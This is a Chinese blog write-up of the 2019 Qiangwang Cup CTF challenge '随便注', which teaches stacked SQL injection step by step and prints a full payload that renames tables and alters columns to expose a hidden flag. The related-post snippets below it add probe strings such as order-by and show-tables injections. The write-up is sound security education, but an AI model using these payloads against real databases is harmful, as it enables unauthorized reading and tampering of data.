[强网杯 2019]随便注 —— 堆叠注入

最新推荐文章于 2024-10-18 20:05:32 发布
原创 最新推荐文章于 2024-10-18 20:05:32 发布 · 2.5k 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#安全

本文探讨了堆叠注入漏洞的原理,如何利用分号操纵SQL语句执行多条命令,从发现表结构到动态修改并查询数据的过程。作者通过实例演示了如何利用堆叠注入避开过滤,揭示了数据库操作中的安全挑战。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

                       [强网杯 2019]随便注

前言

       个人观点,若有误请指教

解题思路及步骤

  • 直接上’引号,结果直接报错了,证明存在sql注入漏洞。
    在这里插入图片描述

  • 判断当前表一共有几列,可得一共两列
    在这里插入图片描述
    在这里插入图片描述

  • 获得当前表的内容,很明显当前表没有flag
    在这里插入图片描述
    注:是不是很蒙?竟然可以直接获得当前表的内容,那我干嘛还要在上面测试表有多少列?其实不是的,你在网页看到一共有几列就证明在数据库中的当前表就只有几列吗?就不能少几列给你看?当然,这道确实显示的列数和在数据库的当前表的列数一样。

  • 尝试联合查询(union),关键词被过滤了
    在这里插入图片描述

  • 至此本人蒙圈了,不知怎解,上网查答案吧🤡。

  • 测试是否存在堆叠注入,顺便查一下所有的数据库名
    在这里插入图片描述
    注:存在堆叠注入

  • 查询当前数据库的表名
    在这里插入图片描述

  • 查看当前数据库的两个表结构,使用desc命令(desc除了降序排列的功能外,还可以查看表结构噢)
    在这里插入图片描述
    在这里插入图片描述
    注:在windows系统下,反单引号 ` 是数据库、表、索引、列和别名用的引用符。也就是说在写表名时应该都加反单引号,但在查words的时候却没有加也能查出来(words加的话也是可以查出来的,而1919810931114514表必须加,不然查不出来),这一点有点奇怪,根据这道题来推测一下吧,只要是全数字的都要反单引号不然查不出来,不是的可加不可加。反正到底是不是影响不大,遇到可以堆叠注入的时候都试一下就好了。

  • 根据上面查询结果,很快可以推断sql语句查询的表是words,而flag在1919810931114514表中,这时候由于后台的sql语句是固定的,所以我们需要将1919810931114514改为words表(原words改成其他名),把列名flag改为id。

//构造payload,记得合起来一起输入
0';
#改变表名
rename table words to words1;
rename table `1919810931114514` to words;
#改列名
alter table words change flag id varchar(100);
#查询表
desc  words;#

在这里插入图片描述

总结

  • 堆叠注入原理
    在sql中,分号表示一条语句的结束。我们就可以构造以下的模板,以至于可以在一次数据库的调用中执行多个语句。
//记得要加#,因为鬼知道后面有没有东西,干脆加上了事
语句; 语句; ··· 语句; #

  • 堆叠注入的局限性(了解一下)
    堆叠注入并不是在每种情况下都能使用的。大多数时候,因为API(应用程序接口)或数据库引擎的不支持,堆叠注入都无法实现。

  • 若题目过滤了太多关键词,极有可能存在堆叠注入!

BUUCTF系列 // [强网2019] 随便
qq_45805420的博客
09-23 723
前言 本题知识点:SQL堆叠注入 WP 打开题目,很明显的提示我们应该是SQL注入了 So,先按照一般的流程,尝试基本的探测姿势 1. 探测有无注入 1' 报错 1'--+ 报错 1'# 正常有回显 1' and 1=1# 正常有回显 1' and 1=2# 正常无回显 可知存在注入,且 --+ 释被过滤,# 释可用 2. 尝试获取列数 1' order by 1# 正常有回显 1' order by 2# 正常有回显 1' order by 3# 报错 用 order by
SQL Injection8(堆叠注入)——强网2019随便
热门推荐
kid的博客
05-28 2万+
SQL Injection8(堆叠注入)——强网2019随便 前言 前面参加强网线上赛,亲身体验了一把ctf从入门到入土,从打ctf变成被ctf打… 这里结合里面的题来对里面的知识点进行一个学习总结 随便是一道sql注入题,因为过滤规则十分强大,所以很难… 这里会用到堆叠注入的知识,堆叠注入前面有所了解,觉得并不难,所以也没练习过,但做这道题的时候就又些懵了。 堆叠注入原理 在SQL中,...
堆叠注入之[强网 2019]随便
Aiwin的博客
05-26 825
堆叠注入之[强网 2019]随便各详解
[强网 2019]随便1
m0_74741186的博客
10-18 921
还有堆叠注入可以测试,只需要加分号就可以了,这个试了好久,发现没加单引号,没有吧前面的语句闭合,就执行不了后面的sql语句。不管是报错注入,布尔盲都需要用到select,报错注入查数据库名字不需要用到select。查表然后再查列吧,但是查列好像要指定表,查表不要指定因为,默认查的是当前数据库的表。这里是比较难的,因为查到表了,我们就要开始查数据了,但是查数据又要用到select。然后注入之后的语句应该是这样的,语句后面应该加个释,好像不释也可以。这个是单引号注入,他的源代码应该是这样的。
[强网 2019]随便 1
weixin_45674567的博客
05-23 682
步骤 找到flag列后: 输入1’;RENAME TABLE words TO words2;RENAME TABLE 1919810931114514 TO words;ALTER TABLE words CHANGE flag id VARCHAR(100) CHARACTER SET utf8 COLLATE utf8_general_ci NOT NULL;# 再输入1’ or ‘1’='1查询,得到flag, 这个参考博文很详细,认真看,不懂就搜,本人只能跟着老师走。 ...
堆叠注入的不同姿势——SQL注入写题笔记
2401_82847928的博客
09-03 1437
可以看到把我们第一种方法使用的set和prepare都过滤了,不过没有关系,我们继续使用handler构造payload!使用了strstr对set和prepare过滤,但是这个函数过滤并不严格,采用大小写绕过。handler命令是mysql专有的一个查询表数据的函数,但是不如select功能强大。成功得到字段“flag”,很明显我们就只剩最后一步,爆出该字段的数据即可。但是select已经被比较严格地过滤了,我们需要寻找其他方法。这道题与第一题相似度很高,但是正则表达式过滤的范围有所差别。
堆叠注入预编译
最新发布
03-23
针对特定比赛环境下的挑战赛题——比如提到过的“强网”,参赛选手可能会遇到需要绕过常规防御手段的情况。此时可以考虑采用如下技巧之一获取隐藏信息[^3]: - 利用 SET 指令临时更改系统配置项; - 准备好含有...
SQL注入——二次注入入门题:Three Hit
Zhujiangcheng的博客
06-14 500
SQL注入——二次注入入门题:Three Hit(一)二次注入简介(二)入门题目: Three Hit 解析 (一)二次注入简介   二次注入是SQL注入的一个子类,如果对SQL注入不太了解的话可以参考之前博客的介绍:SQL注入简介——堆叠注入.   下面来讲什么是二次注入:   二次注入,是指已存储(数据库、文件)的用户的输入被读取后再次进入到 SQL 查询语句中导致的注入。   由此可见,二次注入与普通的数据注入的区别是:普通注入数据是直接进入到 SQL 查询中,而二次注入是输入数据(恶意数据)经处理后
Web_SQL注入(1)
Lemon's blog
07-15 719
[GYCTF2020]Blacklist ——涉及新知识HANDLER ... OPEN等、堆叠注入 这道题和之前做那道强网的题目一样,但之前的方法比如读取flag时改表名或者是用SQL的预处理进行绕过都不可行了,因为过滤了set prepare alter rename 所以这里就涉及到了一种新的方法 HANDLER ... OPEN语句打开一个表,使其可以使用后续HANDLER ... READ语句访问,该表对象未被其他会话共享,并且在会话调用HANDLER ... CLOSE或会话终止之前不会关
【BUUCTF】web之强网2019随便
12-14
开始注入: 1’ : 报错 1’ #:回显正常 1’ order by 1 #: 正常(经测试列数为2–此处小白暗自窃喜) 1’ union select 1,2#: 回显 如图 看来此方法是行不通了,但经过苦苦寻求,了解到了堆叠注入: 库:1’;show databases;# 得到数据库 表:1’;show tables;# 得到俩个表 列:1’;show columns from ‘表名’;# 这里意表名为数字的要加反引号 “ :在网上百度发现 得到 一个带有flag的字段 和 另一个 可查询的表 flag表:可查询表: 到这里虽然发现flag 但是select已经被ban了所
BUUCTF -web- [强网 2019]随便
qq_44640313的博客
12-14 3116
以buuctf的强网2019为例的堆叠注入
buuctf [强网 2019]随便 1
weixin_45642610的博客
01-07 1万+
buuctf web [强网 2019]随便 1 -刷题个人日记 小白一个,写给自己看。 打开后是这样。 从题目和内容来看就是一道sql注入题。 输入 1' or 1=1;# 这个#用来释掉后面的sql语句 显示所有数据,这个数据有什么用我也不知道,但sql注入一般第一步就是这样看看有没有有用的信息(没有)。 输入 1' order by 2;# 1' order by 3;# 到第3列报错,说明只显示两列。 输入1'; show tables;# 可以看到有 191981093
【BUUCTF】[强网 2019]随便 1
qq_45972928的博客
05-06 4295
这是一个典型的sql注入题目 知识点: 1、注入点检测 2、万能匹配 3、暴力获得数据表和其属性 4、sql语句的掌握(order by; union select; rename table; alter table…等等) 1、进入网站 2、看到一个输入框一个提交框,尝试进行数据输入了解大致情况 经过尝试我们发现,只有输入1,2时有显示,输入0或者其他时没有显示 3、测试是否存在注入 and 1=1和and 1=2没有变化 在参数后面加单引号,发现错误,可以尝试进行注入 4、尝试0‘ or
[强网 2019]随便 1-堆叠注入
qq_43564182的博客
07-10 713
解题 0x01 堆叠注入学习(堆叠查询,Stacked Queries) 堆叠注入为攻击者提供了很多控制权,与仅限于SELECT语句的UNION联合查询攻击不同,堆叠注入可以用于执行任何SQL语句。 堆叠注入原理 在sql中,分号表示一条语句的结束。如果在分号的后面再加一条语句,这条语句也可以被执行,继续加一个分号和一条语句,这样就可以在一次数据库的调用中执行多个语句。 举个堆叠注入攻击的例子 执行查询时,第一个语句执行信息查询,第二个语句则将表user的所有内容给删除了。 mysql> select
BUUCTF-Web-随便(堆叠注入)
m0_46315342的博客
08-12 436
这里转载一个大佬的博客: 作者:简简的我 链接:https://www.jianshu.com/p/36f0772f5ce8 来源:简书 然后我简单说一下这个题目吧,这是个sql注入的题目,过滤了select这样的关键字,双写和大小写以及空格都不能进行绕过,所以这里使用的是堆叠注入。 这个作者讲了三种方法,但是第三种好像有点难,第一种和第二种是比较容易接受的。主要是学习一下堆叠注入的语法吧,和sql有点点不一样。然后第二种方法里面作者还讲了一下预处理语句,感觉很牛逼。 ...
[强网 2019]随便
qq_43622442的博客
04-11 1739
[强网 2019]随便 我太菜了啊,哭了。 1.打开网站,是个提交框: 2.查询一下: 3.既然说是注入了,那么拼接 '") ,发现报错了: 4.判断出来是单引号闭合: 5.看列名只有两个,头铁直接上: 6.发现过滤了这些字符,且区分了大小写。其实这里可以用extractvalue报错查看少量信息,因为不需要用select这些: 7.怎么进一步查询呢??我想到了堆叠查询,因为可以...
buuctf-强网2019随便
09-03
buuctf-强网2019随便是一场2019强网举办的CTF比赛中的一道题目。这道题目的名称暗示着它是一个与注入漏洞相关的题目。 注入漏洞是一种网络安全漏洞,攻击者可以通过在用户输入的数据中注入恶意代码来获取...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值